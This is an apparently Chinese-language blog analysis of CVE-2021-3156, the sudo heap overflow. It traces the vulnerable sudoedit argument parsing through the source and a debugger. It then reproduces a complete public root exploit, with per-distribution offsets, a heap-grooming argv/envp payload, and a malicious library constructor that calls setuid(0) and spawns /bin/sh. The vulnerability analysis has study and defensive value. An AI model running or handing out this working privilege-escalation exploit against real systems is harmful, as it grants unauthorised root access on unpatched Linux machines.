CVE-2021-3156 Linux sudo提权分析

$ 前言：

这是本人入门Linux内核的第二个星期，上一篇dirty-pipe分析已经在先知社区投稿了。本着积累多点bypass手段的想法，开始了这个sudo堆溢出学习。

$ EXP：

• https://github.com/blasty/CVE-2021-3156

$ 环境搭建

• ubuntu 18.04
• sudo-1.8.25（环境搭建）
• sudo-1.8.21（静态分析用）

流程：

进入root

sudo?su

搭建pwndbg 编译sudo

make
make?install

这样编译出来的sudo是存在symbol的

$ 漏洞描述

$ 受影响的版本：

sudo: 1.8.2 - 1.8.31p2 sudo: 1.9.0 - 1.9.5p1

$ 检测sudo缺陷存在：

如果响应一个以sudoedit:开头的报错，那么表明存在漏洞。

$ 漏洞复现：

$ 漏洞原理分析：

触发堆溢出：

sudoedit?-s?'\'?1111111111111111

调用链：（不同版本源码的行数不同）

sudo.c:134????????==>?main
sudo.c:247????????==>?policy_check
sudo.c:1149?????==>?sudoers_policy_check
policy.c:775????==>?sudoers_policy_main
sudoers.c:293????==>?set_cmnd
sudoers.c:853?==>?溢出位置

参数：注意几个参数：

• mode
• flags

mode
NewArgv?=?sudoedit?\\?1111111111111111

分析parse_args.c：

parse_args是sudo用于处理传入参数的函数。

1. 静态分析

配置了mode = MODE_EDIT == 0x2

配置flags = MODE_SHELL == 0x20000 由于mode == MODE_EDIT所以跳转到 577行

配置:

*argv[0]?==?'s'?后续为：udoedit
*argv[1]?==?'\\'
*argv[2]?==?'1'?后续为：111111111111111

2. 动态调试分析

131072 == 0x20000 == MODE_SHELL

如图可以证实静态分析上对argv的修改。

分析sudo.c:

1.静态分析：

sudo_mode执行完parse_args被设置为：0x20002

根据转换触发到case MODE_EDIT

然后在MODE_RUN内部执行policy_check

2.动态分析：

131074 == 0x20002

分析sudoers_policy_check：

1.静态分析：

此时argc == 3 然后调用sudoers_policy_main

分析sudoers_policy_main:

静态分析：

• 在270行配置(int) NewArgc == 3
• 在271行固定了\\后的长度最多为2个指针 == 16 字节
• 在276行将*NewArgv == 'sudoedit' '\\' '111...' 'NULL'

sudoers_policy_main将在293行调用到set_cmnd

动态分析：

分析set_cmnd:

静态分析：

由于之前没有给user_cmnd赋值，所以在812行将NewArgv指向sudoedit的指针赋值到user_cmnd

这里没搞懂是怎么ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)判断正确的

在849行中将申请的内存空间大小为 0x13 == '\\1111111111111111 ' 在853行中会判断正确后进入到溢出点第863行 在861行即为存在溢出的点，由于isspace()识别的是'\20'，所以'\0'被bypass了，进而达成溢出条件。

注意：传入2个参数后最多能溢出16字节。user_args堆空间地址只要看在859行下断点看to指定地址就能获取到。

溢出情景模拟：

当前内存：'\\' + '\0' + '1111111111111111' 当前NewArgv + 1 == '\\' + '\0'，那么执行到if判断时，就会from++进而将*from指向了'1111111111111111'，继而调用了*to++ = *from++将'1111111111111111'复制到了user_args堆空间。而这已经将user_args堆空间占满了，但是在for循环上却仍然可以继续将'1111111111111111'复制到user_args堆空间后面的空间，在调用下一次for循环是NewArgv + 1 == '1111111111111111'，而在while上from[0] != '\\'进而导致直接调用*to++ = *from++将'1111111111111111'复制到溢出空间，进而造成堆溢出。

正常的user_args堆空间：

发生溢出后的user_args堆空间：

$ 利用分析

下面是EXP解析：

#include?<stdio.h>
#include?<string.h>
#include?<stdlib.h>
#include?<stdint.h>
#include?<unistd.h>
#include?<ctype.h>

//?512?environment?variables?should?be?enough?for?everyone
#define?MAX_ENVP?512
#define?SUDOEDIT_PATH?"/usr/bin/sudoedit"

typedef?struct?{
????char?*target_name;
????char?*sudoedit_path;
????uint32_t?smash_len_a;
????uint32_t?smash_len_b;
????uint32_t?null_stomp_len;
????uint32_t?lc_all_len;?
}?target_t;

target_t?targets[]?=?{
????{
????????//?Yes,?same?values?as?20.04.1,?but?also?confirmed.
????????.target_name????=?"Ubuntu?18.04.5?(Bionic?Beaver)?-?sudo?1.8.21,?libc-2.27",
????????.sudoedit_path??=?SUDOEDIT_PATH,
????????.smash_len_a????=?56,
????????.smash_len_b????=?54,
????????.null_stomp_len?=?63,?
????????.lc_all_len?????=?212
????},
????{
????????.target_name????=?"Ubuntu?20.04.1?(Focal?Fossa)?-?sudo?1.8.31,?libc-2.31",
????????.sudoedit_path??=?SUDOEDIT_PATH,
????????.smash_len_a????=?56,
????????.smash_len_b????=?54,
????????.null_stomp_len?=?63,?
????????.lc_all_len?????=?212
????},
????{
????????.target_name????=?"Debian?10.0?(Buster)?-?sudo?1.8.27,?libc-2.28",
????????.sudoedit_path??=?SUDOEDIT_PATH,
????????.smash_len_a????=?64,
????????.smash_len_b????=?49,
????????.null_stomp_len?=?60,?
????????.lc_all_len?????=?214
????}
};

void?usage(char?*prog)?{
????fprintf(stdout,
????????"??usage:?%s?<target>\n\n"
????????"??available?targets:\n"
????????"??------------------------------------------------------------\n",
????????prog
????);
????for(int?i?=?0;?i?<?sizeof(targets)?/?sizeof(target_t);?i++)?{
????????printf("????%d)?%s\n",?i,?targets[i].target_name);
????}
????fprintf(stdout,
????????"??------------------------------------------------------------\n"
????????"\n"
????????"??manual?mode:\n"
????????"????%s?<smash_len_a>?<smash_len_b>?<null_stomp_len>?<lc_all_len>\n"
????????"\n",
????????prog
????);
}

int?main(int?argc,?char?*argv[])?{
????printf("\n**?CVE-2021-3156?PoC?by?blasty?<peter@haxx.in>\n\n");

????if?(argc?!=?2?&&?argc?!=?5)?{
????????usage(argv[0]);
????????return?-1;
????}

????target_t?*target?=?NULL;
????if?(argc?==?2)?{
????????int?target_idx?=?atoi(argv[1]);

????????if?(target_idx?<?0?||?target_idx?>=?(sizeof(targets)?/?sizeof(target_t)))?{
????????????fprintf(stderr,?"invalid?target?index\n");
????????????return?-1;
????????}

????????target?=?&targets[?target_idx?];
????}??else?{
????????target?=?malloc(sizeof(target_t));
????????target->target_name????=?"Manual";
????????target->sudoedit_path??=?SUDOEDIT_PATH;?//?"/usr/bin/sudoedit"
????????target->smash_len_a????=?atoi(argv[1]);
????????target->smash_len_b????=?atoi(argv[2]);
????????target->null_stomp_len?=?atoi(argv[3]);
????????target->lc_all_len?????=?atoi(argv[4]);
????}

????printf(
????????"using?target:?%s?['%s']?(%d,?%d,?%d,?%d)\n",?
????????target->target_name,
????????target->sudoedit_path,
????????target->smash_len_a,
????????target->smash_len_b,
????????target->null_stomp_len,
????????target->lc_all_len
????);

????char?*smash_a?=?calloc(target->smash_len_a?+?2,?1);?????//这里填充多2个字节
????char?*smash_b?=?calloc(target->smash_len_b?+?2,?1);?????//这里填充多2个字节

????memset(smash_a,?'A',?target->smash_len_a);??//填充A
????memset(smash_b,?'B',?target->smash_len_b);??//填充B

????smash_a[target->smash_len_a]?=?'\\';
????smash_b[target->smash_len_b]?=?'\\';

????char?*s_argv[]={
????????"sudoedit",?"-s",?smash_a,?"\\",?smash_b,?NULL
????};
????/**?56?*?A?+?'\\'?+?'\0'?+?'\0'?+?'\\'?+?'\0'?+?54?*?B?+?'\\'?+?'\0'????
?????**?生成113个字节空间
?????**/
????char?*s_envp[MAX_ENVP];
????int?envp_pos?=?0;

????for(int?i?=?0;?i?<?target->null_stomp_len;?i++)?{
????????s_envp[envp_pos++]?=?"\\";??//写入63个\\
????}
????s_envp[envp_pos++]?=?"X/P0P_SH3LLZ_";

????char?*lc_all?=?calloc(target->lc_all_len?+?16,?1);??//212
????strcpy(lc_all,?"LC_ALL=C.UTF-8@");
????memset(lc_all+15,?'C',?target->lc_all_len);

????s_envp[envp_pos++]?=?lc_all;
????s_envp[envp_pos++]?=?NULL;

????printf("**?pray?for?your?rootshell..?**\n");

????execve(target->sudoedit_path,?s_argv,?s_envp);??//触发提权
????return?0;
}//*s_envp?==?63个\\+"X/P0P_SH3LLZ_"+lc_all指针+NULL
?//*lc_all?==?"LC_ALL=C.UTF-8@"?+?197个"C"?

#include?<unistd.h>
#include?<stdio.h>
#include?<stdlib.h>
#include?<string.h>

static?void?__attribute__?((constructor))?_init(void);

static?void?_init(void)?{
????printf("[+]?bl1ng?bl1ng!?We?got?it!\n");
#ifndef?BRUTE
????setuid(0);?seteuid(0);?setgid(0);?setegid(0);
????static?char?*a_argv[]?=?{?"sh",?NULL?};
????static?char?*a_envp[]?=?{?"PATH=/bin:/usr/bin:/sbin",?NULL?};
????execv("/bin/sh",?a_argv);
#endif
}

大概EXP调用流程：

利用setlocale将我们exp中calloc的LC_ALL堆块free掉，然后在程序执行时调用get_user_info申请0x80堆块时会将user_args堆块申请在相邻ni->name = compat的service_user相邻位置。然后user_args堆块与ni->name = compat的service_user堆块位置就相对固定，进而达成100%溢出的条件来将原始service_table链表中的compat块中的ni ->name给覆盖掉，进而执行__libc_dlopen时调用到我们伪造的libc，然后调用libc中的初始化函数init来高权限调用setuid(0); seteuid(0); setgid(0); setegid(0);和execv("/bin/sh", a_argv);来提权root。关于实现细节就不方便讲解了。下面是溢出执行我们的libc的参数详情：

$ 分析细节：

• CVE-2021-3156调试分析
• CVE-2021-3156 sudo堆溢出分析与利用
• cve-2021-3156分析
• Sudo Exploit Writeup
• Heap-based buffer overflow in Sudo (CVE-2021-3156)
• util-linux mount/unmount ASLR bypass via environment variable
• CVE-2021-3156 sudo heap-based bufoverflow 复现&分析